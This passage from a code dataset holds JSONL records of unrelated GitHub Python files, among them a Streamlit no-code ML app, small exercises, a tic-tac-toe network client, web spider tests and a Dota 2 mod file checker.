build.get_compile_data().failed_count == 0 or ppj.options.ignore_errors:\r\n if ppj.use_pre_zip_event:\r\n ppj.try_run_event(ZipEvent.PRE)\r\n\r\n build.try_zip()\r\n\r\n if ppj.use_post_zip_event:\r\n ppj.try_run_event(ZipEvent.POST)\r\n else:\r\n Application.log.error(f'Cannot create ZipFile because {build.get_compile_data().failed_count} scripts failed to compile')\r\n sys.exit(build.get_compile_data().failed_count)\r\n elif ppj.zip_files_node is not None:\r\n Application.log.info('Cannot create ZipFile because Zip is disabled in project')\r\n\r\n if build.scripts_count > 0:\r\n Application.log.info(build.get_compile_data().to_string() if build.get_compile_data().success_count > 0 else 'No scripts were compiled.')\r\n\r\n if ppj.packages_node is not None:\r\n Application.log.info(build.package_data.to_string() if build.package_data.file_count > 0 else 'No files were packaged.')\r\n\r\n if ppj.zip_files_node is not None:\r\n Application.log.info(build.zipping_data.to_string() if build.zipping_data.file_count > 0 else 'No files were zipped.')\r\n\r\n Application.log.info('DONE!')\r\n\r\n if ppj.use_post_build_event and build.get_compile_data().failed_count == 0:\r\n ppj.try_run_event(BuildEvent.POST)\r\n\r\n return build.get_compile_data().failed_count\r\n","repo_name":"fireundubh/pyro","sub_path":"pyro/Application.py","file_name":"Application.py","file_ext":"py","file_size_in_byte":9153,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"53"} +{"seq_id":"34560951808","text":"\"\"\"\nx축 값을 커스텀하는 방법\nxticks: x축을 구성하는 단위를 정의\nxticklabels: x축에 해당하는 라벨을 정의\n\"\"\"\n\nimport matplotlib.pyplot as plt\nfrom numpy.random import randn\n\nr = randn(1000).cumsum()\nprint(r)\nfig = plt.figure()\nax = fig.add_subplot(1, 1, 1)\nax.set_xticks([0, 250, 500, 750, 1000])\nax.set_xticklabels([\"item_1\", \"item_2\", \"item_3\", \"item_4\", \"item_5\"], rotation=45, fontsize='small')\nax.set_title('wow')\nax.set_xlabel('hehe')\nax.plot(r)\n\nplt.show()\n\n\n\n","repo_name":"shinyeoeun/Performance_TestAutomation_Line_App","sub_path":"scripts/template/SAMPLE_Graph.py","file_name":"SAMPLE_Graph.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"18753293344","text":"suspects = {\"Eva\": [\"TGAAGGACCTTC\", \"AAAACCTCA\", \"TTAGCTATCGC\", \"TTGTGGTGGC\", \"AGGCCTCA\"],\n \"Larisa\": [\"TGAAGGACCTTC\", \"AAAACCTCA\", \"GCCAGTGCCG\", \"AAGTAGTGAC\", \"AGGCCTCA\"],\n \"Matej\": [\"TGCAGGAACTTC\", \"AAAACCTCA\", \"CCAGCAATCGC\", \"TTGTGGTGGC\", \"AGGCCTCA\"],\n \"Miha\": [\"TGCAGGAACTTC\", \"AAAACCTCA\", \"GCCAGTGCCG\", \"GGGAGGTGGC\", \"GCCACGG\"]}\n\nwith open(\"dna.txt\", \"r\") as dna_file:\n dna = dna_file.read()\n\nfor thief in suspects:\n arrest = True\n for x in suspects[thief]:\n if x not in dna:\n arrest = False\n break\n else:\n print(thief)\n","repo_name":"GeorgSfL/forensic","sub_path":"forensic.py","file_name":"forensic.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15387880016","text":"import streamlit as st\nfrom sklearn.model_selection import train_test_split\nfrom streamlit.runtime.scriptrunner.script_run_context import get_script_run_ctx\nimport sklearn.metrics as metrics\nimport xgboost\nimport time as t\nimport numpy as np\nimport pandas as pd\n\n\n\ndef main() -> None:\n\n \n # Sklearn packages/module metadata\n\n model_selection_dict = { 
\"Classification\":{\n \"LogisticRegression\":\"sklearn.linear_model\",\n \"XGBClassifier\":\"xgboost.sklearn\",\n \"SVC\":\"sklearn.svm\",\n \"KNeighborsClassifier\":\"sklearn.neighbors\",\n \"GaussianNB\":\"sklearn.naive_bayes\",\n \"BernoulliNB\":\"sklearn.naive_bayes\",\n \"LinearSVC\":\"sklearn.svm\",\n \"MultinomialNB\":\"sklearn.naive_bayes\",\n \"DecisionTreeClassifier\":\"sklearn.tree\",\n \"RandomForestClassifier\":\"sklearn.ensemble\"\n },\n \"Regression\":{\n \"LinearRegression\":\"sklearn.linear_model\",\n \"XGBRegressor\":\"xgboost.sklearn\",\n \"Lasso\":\"sklearn.linear_model\",\n \"ElasticNet\":\"sklearn.linear_model\",\n \"BayesianRidge\":\"sklearn.linear_model\",\n \"Ridge\":\"sklearn.linear_model\",\n \"KNeighborsRegressor\":\"sklearn.neighbors\",\n \"SVR\":\"sklearn.svm\",\n \"DecisionTreeRegressor\":\"sklearn.tree\",\n \"RandomForestRegressor\":\"sklearn.ensemble\"\n }\n } \n\n sklearn_data_dict = {\"module\":\"sklearn.datasets\",\n \"data\":{\n \"Iris (Multi-Class Classification)\":\"load_iris\",\n \"Diabetes (Regression)\":\"load_diabetes\",\n \"Wine (Mult-Class Classification)\":\"load_wine\",\n \"Breast Cancer (Binary Classification)\":\"load_breast_cancer\"\n } \n }\n\n # Data Transformations Dict\n data_preprocess_dict = {\n \"StandardScaler\": {\"class\":\"StandardScaler\",\"module_name\":\"sklearn.preprocessing\"},\n \"MinMaxScaler\": {\"class\":\"MinMaxScaler\",\"module_name\":\"sklearn.preprocessing\"},\n }\n\n ctx = get_script_run_ctx()\n\n #st.write(ctx.session_id)\n\n \n # if hasattr(st.session_state,'user_session_data'):\n # user_session_data = st.session_state.user_session_data[ctx.session_id]\n \n if not hasattr(st.session_state,'user_session_data'):\n st.session_state.user_session_data = {}\n\n if ctx.session_id not in st.session_state.user_session_data:\n st.session_state.user_session_data[ctx.session_id] = {}\n \n \n \n #================== General Use Functions =====================#\n\n\n #import module class\n def import_class(module_name,class_name):\n try:\n module = __import__(module_name, globals(),locals(),[class_name])\n except ImportError:\n return None\n return vars(module)[class_name]\n\n \n def instantiate_obj(class_name,module_name):\n object_instance = import_class(str(module_name),str(class_name))\n return object_instance()\n \n def update_data():\n get_train_test(str(data_key),data_source)\n st.session_state.user_session_data[ctx.session_id]['data_source'] = data_source \n st.session_state.user_session_data[ctx.session_id]['data_key'] = data_key\n\n\n\n def check_cache_data():\n\n # if there is no data then load data\n if 'data' not in st.session_state.user_session_data[ctx.session_id]:\n update_data()\n\n # if the dataset changed then change the dataset\n if 'data_key' in st.session_state.user_session_data[ctx.session_id] and st.session_state.user_session_data[ctx.session_id]['data_key'] != data_key:\n update_data()\n\n if 'data_source' in st.session_state.user_session_data[ctx.session_id] and st.session_state.user_session_data[ctx.session_id]['data_source'] != data_source:\n update_data()\n \n \n \n \n def user_data_check():\n if data_source == 'My Computer':\n st.error('Please upload csv file with your data')\n\n \n\n \n def check_cache_hyperparams():\n module_name = model_selection_dict[prediction_task][algorithm_name]\n\n # Check for change in algo\n if 'pred_algorithm_name' in st.session_state.user_session_data[ctx.session_id] and 'param_algorithm_name' in st.session_state.user_session_data[ctx.session_id]:\n check_1 = 
st.session_state.user_session_data[ctx.session_id]['pred_algorithm_name'] == st.session_state.user_session_data[ctx.session_id]['param_algorithm_name']\n same_algo_bool = st.session_state.user_session_data[ctx.session_id]['algorithm_name'] == algorithm_name and check_1\n \n elif 'param_algorithm_name' in st.session_state.user_session_data[ctx.session_id]:\n same_algo_bool = st.session_state.user_session_data[ctx.session_id]['param_algorithm_name'] == algorithm_name\n\n elif 'pred_algorithm_name' in st.session_state.user_session_data[ctx.session_id]:\n same_algo_bool = st.session_state.user_session_data[ctx.session_id]['pred_algorithm_name'] == algorithm_name\n \n elif 'pred_algorithm_name' not in st.session_state.user_session_data[ctx.session_id] and 'param_algorithm_name' not in st.session_state.user_session_data[ctx.session_id]:\n same_algo_bool = False\n\n elif st.session_state.user_session_data[ctx.session_id]['algorithm_name'] == algorithm_name:\n same_algo_bool = True\n \n # check for existing hyperparams\n if 'hyperparams' in st.session_state.user_session_data[ctx.session_id] and same_algo_bool :\n #hyperparams = user_session_data.hyperparams\n model = model_instance(str(algorithm_name) ,str(module_name)) #can I call set params on this?\n model_param_dict = st.session_state.user_session_data[ctx.session_id]['hyperparams'] \n if 'dual' in model_param_dict:\n model_param_dict['dual'] = False\n model = model.set_params(**model_param_dict)\n return model, model_param_dict\n else:\n model = model_instance(str(algorithm_name) ,str(module_name))\n model_param_dict = model.get_params()\n st.session_state.user_session_data[ctx.session_id]['hyperparams'] = model_param_dict\n return model, model_param_dict\n \n \n\n\n #================== Model Instance Functions =====================#\n\n \n # instantiate new ml model \n @st.cache_resource \n def model_instance(algorithm_name,module_name):\n\n model = import_class(str(module_name),str(algorithm_name))\n return model()\n \n\n def train_model(data_key,data_source,model):\n \n if 'data' in st.session_state.user_session_data[ctx.session_id]: \n X_train, X_test, y_train, y_test = st.session_state.user_session_data[ctx.session_id]['data']\n model.fit(X_train,y_train)\n return [model,X_test,y_test]\n \n else:\n X_train, X_test, y_train, y_test = get_train_test(str(data_key),data_source) #change function name\n model.fit(X_train,y_train)\n return [model,X_test,y_test]\n\n\n \n #================== Data Related Functions =====================#\n\n \n \n def get_train_test(tableName,data_source) -> list:\n \n \n def split_data(dataframe) -> None:\n X = dataframe.iloc[:,:-1]\n y = dataframe.iloc[:,-1:]\n st.session_state.user_session_data[ctx.session_id]['data'] = train_test_split(X, y, test_size=0.3) \n st.session_state.user_session_data[ctx.session_id]['data_cols'] = dataframe.columns\n return None\n\n\n if data_source == 'My Computer':\n df = pd.read_csv(data_key)\n split_data(df)\n st.session_state.user_session_data[ctx.session_id]['feature_names'] = df.columns\n return st.session_state.user_session_data[ctx.session_id]['data']\n \n if data_source == 'Sklearn Dataset':\n #Instantiate sklearn data object\n dataset_name = sklearn_data_dict['data'][data_key]\n data_module = sklearn_data_dict['module']\n data_instance = instantiate_obj(dataset_name,data_module)\n df = pd.DataFrame(np.column_stack((data_instance['data'],data_instance['target'])),\n columns=[*data_instance['feature_names'],'target'])\n split_data(df)\n return 
st.session_state.user_session_data[ctx.session_id]['data']\n \n \n \n #================== Frontend Integration =====================#\n \n \n st.sidebar.success('The Research Lab™')\n\n st.header(':green[No]-Code-ML')\n\n # Display the input values\n prediction_task = st.selectbox(\"Prediction Task\",[\"Classification\",\"Regression\"])\n data_source = st.selectbox(\"Data Location\",['My Computer','Sklearn Dataset'])\n if data_source == 'Sklearn Dataset':\n data_key = st.selectbox(\"Choose a Dataset\",[i for i in sklearn_data_dict['data'].keys()])\n if data_source == 'My Computer':\n data_key = st.file_uploader('Upload Data as CSV')\n algorithm_name = st.selectbox(\"Algorithm Type\", [i for i in model_selection_dict[prediction_task].keys()]) \n \n\n # Create Buttons for Setting Model Parameters, Model Training, and Data Transformations \n params_btn,transform_data_btn,train_btn,predict_btn = st.columns([0.07,0.06,0.04,0.04],gap=\"small\")\n with params_btn:\n params_bool = st.selectbox('Set Model Params',['No','Yes'],index=0)\n with transform_data_btn:\n transform_data_bool = st.selectbox('Transform Data',['No','Yes'],index=0)\n with train_btn:\n train_model_bool = st.selectbox('Train',['No','Yes'],index=0)\n with predict_btn:\n predict_bool = st.selectbox('Predict',['No','Yes'],index=0)\n\n \n \n \n\n #Dictionary to hold new parameters\n model_param_dict = {}\n params_form = st.empty() \n\n # Set Model Params Functionality\n if params_bool == 'Yes' and 'Yes' not in [transform_data_bool,train_model_bool,predict_bool]:\n\n with params_form.form(\"hyperparam_form\"):\n \n _,model_param_dict = check_cache_hyperparams()\n \n \n \n st.write(f\" :green[{algorithm_name}] Hyperparameters\")\n \n for key,value in model_param_dict.items():\n if key == 'dual':\n st.success(key + \" must be False\")\n value = False\n original_type = 'NoneType' if isinstance(model_param_dict[key],type(None)) else type(model_param_dict[key])\n model_param_dict[key] = None if original_type == 'NoneType' else original_type(st.text_input(f\"{key}\",model_param_dict.get(key,value)))\n submitted = st.form_submit_button(\"Update Hyperparameters\")\n\n if submitted:\n st.session_state.user_session_data[ctx.session_id]['hyperparams'] = model_param_dict\n st.session_state.user_session_data[ctx.session_id]['algorithm_name'] = algorithm_name\n st.session_state.user_session_data[ctx.session_id]['param_algorithm_name'] = algorithm_name\n params_form.empty()\n \n \n\n\n # Logic for training a model\n if train_model_bool == 'Yes' and 'Yes' not in [params_bool,transform_data_bool,predict_bool]:\n user_data_check()\n check_cache_data()\n model, _ = check_cache_hyperparams()\n trained_model,X_test,y_test = train_model(data_key,data_source,model)\n st.session_state.user_session_data[ctx.session_id]['model'] = trained_model\n\n st.title(\"Model Accuracy\")\n if prediction_task == 'Classification':\n report = metrics.classification_report(trained_model.predict(X_test),y_test,output_dict=True)\n st.table(pd.DataFrame(report).T)\n \n else:\n st.text(trained_model.score(X_test,y_test))\n\n\n # perform data transformations\n if transform_data_bool == 'Yes' and 'Yes' not in [params_bool,train_model_bool,predict_bool]:\n user_data_check()\n check_cache_data()\n\n X_train,X_test,y_train,y_test = st.session_state.user_session_data[ctx.session_id]['data']\n\n try:\n st.table(X_train.describe())\n except:\n st.table(pd.DataFrame(X_train,columns=st.session_state.user_session_data[ctx.session_id]['data_cols'][0:-1]).describe())\n\n\n 
data_transformation_form = st.empty()\n with data_transformation_form.form(\"transformData\"):\n transform_x = st.selectbox(\"Independent Variable Transformations\",['None','StandardScaler','MinMaxScaler','Log-Transform'])\n transform_y = st.selectbox(\"Dependent Variable Transformations\",['None','Log-Transform'])\n submitted = st.form_submit_button(\"submit\")\n \n if submitted:\n if transform_x != 'None' and transform_x != 'Log-Transform':\n module_name = data_preprocess_dict[transform_x][\"module_name\"]\n object_class = data_preprocess_dict[transform_x][\"class\"]\n data_preprocessor = instantiate_obj(object_class,module_name)\n X_train = data_preprocessor.fit_transform(X_train)\n X_test = data_preprocessor.fit_transform(X_test)\n st.success(f\"X_train Shape:{X_train.shape}, X_test Shape:{X_test.shape}\")\n\n \n if transform_x == 'Log-Transform':\n X_train = np.log(X_train)\n X_test = np.log(X_test)\n st.success(f\"X_train Shape:{X_train.shape}, X_test Shape:{X_test.shape}\")\n\n\n \n if transform_y == 'Log-Transform':\n y_train = np.log(y_train)\n y_test = np.log(y_test)\n st.success(f\"Y_train Shape:{y_train.shape}, Y_test Shape:{y_test.shape}\")\n st.session_state.user_session_data[ctx.session_id]['data'] = [X_train,X_test,y_train,y_test]\n\n data_transformation_form.empty()\n\n\n\n if predict_bool == 'Yes' and 'Yes' not in [params_bool,transform_data_bool,train_model_bool]:\n \n user_data_check()\n check_cache_data()\n model,model_param_dict = check_cache_hyperparams()\n\n\n prediction_form = st.empty()\n preDict = {key:'' for key in st.session_state.user_session_data[ctx.session_id]['data_cols'][0:-1]}\n\n with prediction_form.form('predict_here'):\n for key,value in preDict.items():\n preDict[key] = st.text_input(f\"{key}\",model_param_dict.get(key,value))\n submitted = st.form_submit_button(\"submit\")\n \n if submitted:\n trained_model,X_test,y_test = train_model(data_key,data_source,model)\n sample_data = np.array([int(feature) for key,feature in preDict.items()])\n sample_data = sample_data.reshape(1,len(sample_data))\n st.session_state.user_session_data[ctx.session_id]['pred_algorithm_name'] = algorithm_name\n st.success(f'{trained_model.predict(sample_data)}')\n prediction_form.empty() \n \n\n\n \n return None\n\n\n\nmain()\n","repo_name":"TheResearchLab/Streamlit-No-Code-ML","sub_path":"No-Code-ML.py","file_name":"No-Code-ML.py","file_ext":"py","file_size_in_byte":15360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29859509687","text":"'''\nEscreva um programa que, dada uma matriz quadrada de ordem N, de elementos inteiros,\nexiba os elementos da diagonal principal, isto é, os elementos onde I = J.\nObs: N será lido (N <= 10). 
\n\n\n'''\n\nA=[]\nn=int(input('Ordem da matriz:'))\nfor i in range(n):\n linha=[]\n for j in range(n):\n print('Elemento[',i,'][',j,']:', sep='', end='')\n num=int(input())\n linha.append(num)\n A.append(linha)\nprint('\\nmatriz A')\nfor i in range(n):\n for j in range(n):\n print('{0:4d}'.format(A[i][j]),end='')\n print('')\n#Exibindo a diagonal principal (versão 1)\nprint('\\nElementos da diagonal principal (versao 1)')\nfor i in range(n):\n for j in range(n):\n if i==j:\n print(A[i][j],' ',end='')\n#Exibindo a diagonal principal (versão 2)\nprint('\\nElementos da diagonal principal (versao 2)')\nfor i in range(n):\n print(A[i][i],' ', end='')","repo_name":"hermanoaraujo/python","sub_path":"Matriz/matriz-diagonal-principal.py","file_name":"matriz-diagonal-principal.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17182403180","text":"class Solution:\n def sortSentence(self, s: str) -> str:\n \n sentence = s.split(' ')\n sortedSentence = [0]*len(sentence)\n \n for i in sentence:\n num = int(i[-1])\n sortedSentence[num-1] = i[:-1]\n return ' '.join(sortedSentence)","repo_name":"addisumotora/competitive_programming","sub_path":"sortingsentence.py","file_name":"sortingsentence.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9894916152","text":"import pickle\r\nimport pandas\r\n\r\n\r\nmypath = \"G:\\\\Datasets&GP\\\\DEAP\\\\data_preprocessed_python\\\\\"\r\n\r\n#Converting each file to csv file\r\nheader = 0\r\nfor i in range(1,33):\r\n t=0\r\n name = \"\"\r\n if i < 10:\r\n name = \"s0\" + str(i)\r\n else:\r\n name = \"s\" + str(i)\r\n print(name)\r\n f = open(mypath+name+\".dat\", 'rb')\r\n data = pickle.load(f, encoding='latin1')\r\n labels = data[\"labels\"]\r\n\r\n for k in range(40) :\r\n\r\n for j in range(4):\r\n Y = labels[k][j]\r\n Y = pandas.Series(Y)\r\n if header==0:\r\n Y.to_csv(mypath+'convertedData\\\\label'+str(j)+'.csv', mode='a', index=False)\r\n else:\r\n Y.to_csv(mypath+'convertedData\\\\label'+str(j)+'.csv', mode='a', index=False,header=False)\r\n header+=1\r\n","repo_name":"PolaPFA/SAEEG","sub_path":"ReadingTheOrginalData/Labels.py","file_name":"Labels.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10324213212","text":"import sys, math\nfrom time import sleep\nfrom PodSixNet.Connection import connection, ConnectionListener\nfrom TicTacToe import TicTacToe\ntemp = \"\"\nclass Client(ConnectionListener, TicTacToe):\n def __init__(self, host, port):\n self.Connect((host, port))\n self.players = {}\n self.data = []\n \n TicTacToe.__init__(self)\n \n \n def Loop(self):\n self.Pump()\n connection.Pump()\n self.Events()\n \n\n def Click(self, e):\n print(e.pos)\n col = math.floor(e.pos[0]/100)\n row = math.floor(e.pos[1]/100)\n connection.Send({\"action\": \"click\", \"position\": e.pos, \"row\":row, \"col\": col})\n\n def newGame(self):\n\n connection.Send({\"action\":\"newgame\"})\n \n ###############################\n ### Network event callbacks ###\n ###############################\n def Network_newgame(self,data):\n print(data)\n self.drawNewBoard()\n def Network_click(self,data):\n print(\"click\")\n print(data)\n self.Turn(data)\n \n \n def Network(self, data):\n #print('network:', data)\n pass\n \n def Network_connected(self, data):\n self.statusLabel 
= \"connected\"\n print(\"CONNECTED\")\n print(data)\n \n def Network_error(self, data):\n print(data)\n import traceback\n traceback.print_exc()\n self.statusLabel = data['error'][1]\n connection.Close()\n \n def Network_disconnected(self, data):\n self.statusLabel += \" - disconnected\"\n\nif __name__ == '__main__':\n if len(sys.argv) != 2:\n print(\"Usage:\", sys.argv[0], \"host:port\")\n print(\"e.g.\", sys.argv[0], \"localhost:31425\")\n else:\n host, port = sys.argv[1].split(\":\")\n c = Client(host, int(port))\n #c = Client(\"localhost\", 12345)\n while 1:\n c.Loop()\n sleep(0.001)","repo_name":"mfyu/TicTacToe","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8335746422","text":"\"\"\"\nTests for the \"web\" module\n\"\"\"\n\nimport multiprocessing\nimport time\n\nimport flask\nimport pytest\nimport requests\n\nfrom simplespider import Spider\nfrom simplespider.web import DownloadTask, Downloader, LinkExtractor, \\\n ScrapingTask\nfrom simplespider.tests.functional.fixtures import queue # noqa\n\n\n@pytest.fixture(scope='function')\ndef simple_website(request):\n class MyWebsite(multiprocessing.Process):\n def __init__(self, app):\n super(MyWebsite, self).__init__()\n self._app = app\n\n def run(self):\n self._app.run(port=5001)\n\n app = flask.Flask('simple_website')\n\n @app.route('/')\n def homepage():\n return \"\"\"\n \n \n Homepage\n \n Hello, Link!\n \n \n \n \"\"\"\n\n @app.route('/hello')\n def hello():\n # name = flask.request.args.get('name', 'world')\n name = 'world'\n return \"\"\"\n \n \n Homepage\n \n
Hello, {0}!
\n Homepage\n \n \n \"\"\".format(name)\n\n @app.route('/spam')\n def spam():\n return \"\"\"\n \n \n Homepage\n \n
Welcome to the spam page!
\n Homepage\n Spam1\n Spam2!\n Spam3!\n Spam4!\n Hello, again!\n Recursive Spam Page!\n \n \n \"\"\"\n\n proc = MyWebsite(app)\n proc.daemon = True\n\n def cleanup():\n proc.terminate()\n\n request.addfinalizer(cleanup)\n\n proc.start()\n time.sleep(.1) # give it some time to come up..\n return proc\n\n\n@pytest.fixture\ndef web_spider(queue):\n class LoggingSpider(Spider):\n def __init__(self, **kw):\n self._log = []\n super(LoggingSpider, self).__init__(**kw)\n\n def _wrap_task_execution(self, runner, task):\n self._log.append((runner, task))\n super(LoggingSpider, self)._wrap_task_execution(runner, task)\n\n spider = LoggingSpider(queue=queue)\n spider._testing = {\n 'runners': [Downloader(), LinkExtractor()]\n }\n spider.add_runners(spider._testing['runners'])\n return spider\n\n\ndef test_simple_website(simple_website):\n \"\"\"\n Make sure the simple website is behaving..\n \"\"\"\n\n response = requests.get('http://127.0.0.1:5001/hello')\n assert response.ok\n assert response.status_code == 200\n\n response = requests.get('http://127.0.0.1:5001/does-not-exist')\n assert not response.ok\n assert response.status_code == 404\n\n\ndef test_simple_spider_run(simple_website, web_spider):\n web_spider.queue_task(DownloadTask(url='http://127.0.0.1:5001/'))\n #web_spider.run()\n\n tasks = web_spider.yield_tasks()\n\n downloader, scraper = web_spider._testing['runners']\n\n name, task = tasks.next()\n assert name == 'simplespider.web:DownloadTask:http://127.0.0.1:5001/'\n assert isinstance(task, DownloadTask)\n assert task['url'] == 'http://127.0.0.1:5001/'\n web_spider.run_task(task)\n assert web_spider._log.pop(0) == (downloader, task)\n\n name, task = tasks.next()\n assert name == 'simplespider.web:ScrapingTask:http://127.0.0.1:5001/'\n assert isinstance(task, ScrapingTask)\n assert task['url'] == 'http://127.0.0.1:5001/'\n web_spider.run_task(task)\n assert web_spider._log.pop(0) == (scraper, task)\n\n name, task = tasks.next()\n assert name == 'simplespider.web:DownloadTask:http://127.0.0.1:5001/hello'\n assert isinstance(task, DownloadTask)\n assert task['url'] == 'http://127.0.0.1:5001/hello'\n web_spider.run_task(task)\n assert web_spider._log.pop(0) == (downloader, task)\n\n name, task = tasks.next()\n assert name == 'simplespider.web:ScrapingTask:http://127.0.0.1:5001/hello'\n assert isinstance(task, ScrapingTask)\n assert task['url'] == 'http://127.0.0.1:5001/hello'\n web_spider.run_task(task)\n assert web_spider._log.pop(0) == (scraper, task)\n\n # assert len(web_spider._task_queue) == 0\n # assert len(web_spider._log) == 0\n","repo_name":"rshk/simplespider","sub_path":"simplespider/tests/functional/test_web_spider.py","file_name":"test_web_spider.py","file_ext":"py","file_size_in_byte":4761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34092577125","text":"from os import listdir, path\nfrom client.util.HTMLUtil import HTMLUtil\nfrom client.util.html.ButtonBuilder import ButtonBuilder\nfrom client.util.html.ListBuilder import ListBuilder\nfrom client.util.html.LinkBuider import LinkBuilder\n\nvalid_report_types = ['NLU', 'NLU_Timing', 'Refresh_DD', 'Markov_Chain']\n\n\ndef index_routes(app):\n _local_dir = path.dirname(path.abspath(__file__))\n client_path = path.join(_local_dir, '..', '..', 'client')\n\n @app.route('/')\n def index():\n report_path = path.join(client_path, 'compiled')\n\n # read out and sort all compiled reports (ignore the README)\n files = [f for f in listdir(report_path) if 
path.isfile(path.join(report_path, f)) and f != \"README.md\"]\n files.sort()\n\n file_links = [LinkBuilder(text=f.replace('.html', ''), url='/report?name=' + f) for f in files]\n file_list = ListBuilder(list_items=file_links, list_header='Your Reports')\n\n buttons = [ButtonBuilder(text='New ' + b + ' Report', button_id=b, attrs={\"data-type\": b}) for b in valid_report_types]\n button_list = ListBuilder(list_items=buttons, list_header=' Generate Reports')\n\n template = HTMLUtil.get_template('index.html')\\\n .replace('$$__REPORTS__$$', file_list.compile())\\\n .replace('$$__GEN_REPORTS__$$', button_list.compile())\n\n return template\n\n","repo_name":"michaelalbinson/glowing-pancake-praw","sub_path":"server/routes/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30940053145","text":"# Import the random module here\nimport random\n# Split string method\nnames_string = \"Angela, Ben, Jenny, Michael, Chloe\"\nnames = names_string.split(\", \")\n# 🚨 Don't change the code above 👆\n\n#Write your code below this line 👇\nitems = len(names)\n\nchoice_first = random.randint(0, items -1)\nprint(f'random index returned was: {choice_first}')\nwho_pay = names[choice_first]\nprint(who_pay + \" will pay\")","repo_name":"marwaslim/Python-Udemy","sub_path":"banker_roulette.py","file_name":"banker_roulette.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21048621820","text":"import os\nimport psutil\nimport helper\nimport mpaths\nimport tkinter as tk\nfrom tkinter import messagebox\nfrom tkinter import filedialog\n\ndef setFolder(main_window):\n dialog_root = tk.Tk()\n dialog_root.withdraw()\n folder = filedialog.askdirectory()\n with open(mpaths.path_file, 'w') as file: file.write(folder)\n messagebox.showinfo(\"\",\"Path saved, go start Minify again.\")\n main_window.destroy()\n\n# this class is called with getattr method and calls all functions here alphabetically\n# use naming convention (a_, b_, c_ ...etc) to run this class top to bottom if order mattters\n\nclass MyClass:\n def __init__(self, checkboxes, main_window):\n self.checkboxes = checkboxes\n self.toggle_flag = False\n self.main_window = main_window\n\n def a_isSteamFound(self):\n if mpaths.steam_dir == \"\":\n mpaths.toggle_flag = True\n print(\"Error: 'Steam is not installed on this system.\")\n\n def b_isDotaInstallFound(self):\n dota2path = os.path.join(mpaths.steam_dir, \"steamapps\\\\common\\\\dota 2 beta\\\\game\\\\bin\\\\win64\\\\dota2.exe\")\n\n if not os.path.exists(dota2path):\n self.toggle_flag = True\n \n message_root = tk.Tk()\n message_root.withdraw()\n messagebox.showinfo(\"\",f\"Dota2 not found in '{dota2path}' ---- Select where your 'SteamLibrary' folder is. 
For example 'D:\\SteamLibrary'\")\n message_root.destroy()\n setFolder(self.main_window)\n \n def c_isMinifyFolderPresent(self):\n if not os.path.exists(mpaths.dota_minify):\n os.makedirs(mpaths.dota_minify)\n\n def d_isGameinfoPatched(self):\n with open(mpaths.gameinfo_dir, 'r') as file:\n if helper.l1 and helper.l2 not in file.read():\n helper.patchGameInfo(mpaths.gameinfo_dir)\n\n def e_isDotaRunning(self):\n if \"dota2.exe\" in (p.name() for p in psutil.process_iter()):\n self.toggle_flag = True\n print(\"Error: Please close Dota 2 and restart Minify.\")\n\n def f_isDecompilerFound(self):\n if not os.path.exists(os.path.join(mpaths.minify_dir, 'Decompiler.exe')):\n self.toggle_flag = True\n print(\"Error: 'Decompiler.exe' not found, click Help for instructions.\")\n \n def g_isDllFound(self):\n if not os.path.exists(os.path.join(mpaths.minify_dir, 'libSkiaSharp.dll')):\n self.toggle_flag = True\n print(\"Error: 'libSkiaSharp.dll' not found, click Help for instructions.\")\n\n def h_isCompillerFound(self):\n if not os.path.exists(mpaths.resource_compiler):\n helper.workshop_installed == False\n print(\"Styling mods have been disabled.\")\n print(\"Install Steam Workshop Tools to use them. Click Help for instructions.\")\n else:\n helper.workshop_installed = True\n\n def i_verifyMods(self):\n for folder in mpaths.mods_folders:\n mod_path = os.path.join(mpaths.mods_dir, folder)\n\n if not os.path.exists(os.path.join(mod_path, 'files')):\n self.toggle_flag = True\n print(\"Missing 'files' folder in 'mods/{}'\".format(folder))\n if not os.path.exists(os.path.join(mod_path, 'blacklist.txt')):\n self.toggle_flag = True\n print(\"Missing 'blacklist.txt' folder in 'mods/{}'\".format(folder))\n if not os.path.exists(os.path.join(mod_path, 'styling.txt')):\n self.toggle_flag = True\n print(\"Missing 'styling.txt' folder in 'mods/{}'\".format(folder))","repo_name":"robbyz512/dota2-minify","sub_path":"validatefiles.py","file_name":"validatefiles.py","file_ext":"py","file_size_in_byte":3574,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"53"} +{"seq_id":"20247044902","text":"from rest_framework import serializers\nfrom . 
